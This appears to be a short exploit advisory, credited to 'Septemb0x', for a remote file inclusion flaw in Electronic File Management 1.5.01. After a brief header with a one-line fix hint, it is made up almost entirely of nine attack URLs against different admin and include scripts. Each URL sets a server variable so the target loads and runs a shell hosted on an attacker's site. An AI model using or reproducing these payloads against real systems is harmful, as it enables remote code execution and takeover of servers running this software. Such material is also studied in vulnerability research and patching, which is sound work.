#############################################################

# Application Name : Electronic File Management 1.5.01

# Vulnerable Type : Remote File Inclusion Vulnerability

# Infection : Remote File Control, Editing...

# Bug Fix Advice : variable to define

# author : Septemb0x

# Script Down.& WebSite : http://electronicfilemanagement.net/Trial_Download/EFM_1.5.01.rar

#############################################################

< ------------------- header data end of ------------------- >

< -- bug code start -- >

http://[target]/[path]/includes/config.inc.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/chpass1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/deleted_file2s.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/edit_profile.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/smChangepass.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/include/user_statistics1.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/news/newsmanagement.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/tree/iframe_all_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?
http://[target]/[path]/admin/tree/iframe_assign_files.php?HTTP_SERVER_VARS[DOCUMENT_ROOT]=http://[attackersite]/shell?

---------------------------------------------------------------


< -- bug code end of -- >